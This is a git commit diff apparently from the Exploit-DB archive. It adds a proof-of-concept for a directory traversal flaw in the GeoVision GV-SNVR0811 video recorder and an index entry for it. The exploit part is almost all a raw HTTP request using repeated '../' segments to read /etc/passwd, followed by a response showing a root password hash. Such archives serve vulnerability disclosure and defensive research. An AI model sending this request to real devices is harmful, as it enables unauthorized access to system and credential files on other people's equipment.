DB: 2018-07-23
1 changes to exploits/shellcodes GeoVision GV-SNVR0811 - Directory Traversal
This commit is contained in:
Offensive Security
parent
350bb348ff
commit
939bd7d9cd
2 changed files with 35 additions and 0 deletions
34
exploits/hardware/webapps/45065.txt
Normal file
34
exploits/hardware/webapps/45065.txt
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: GeoVision GV-SNVR0811 Directory Traversal
|
||||
# Exploit Author: Berk Dusunur
|
||||
# Google Dork: N/A
|
||||
# Type: Hardware
|
||||
# Date: 2018-07-21
|
||||
# Vendor Homepage: http://www.geovision.com.tw/product/GV-SNVR0811
|
||||
# Software Link: http://www.geovision.com.tw/product/GV-SNVR0811
|
||||
# Affected Version: N/A
|
||||
# Tested on: Parrot OS
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
# Proof Of Concept
|
||||
|
||||
GET Request
|
||||
|
||||
GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: target
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
|
||||
Gecko/20100101 Firefox/61.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
Response
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server:Cross Web Server
|
||||
Content-length: 59
|
||||
Content-type: application/octet-stream
|
||||
|
||||
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
|
||||
|
|
@ -39671,6 +39671,7 @@ id,file,description,date,author,type,platform,port
|
|||
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
|
||||
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
|
||||
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
|
||||
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
|
||||
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
|
||||
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
|
||||
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue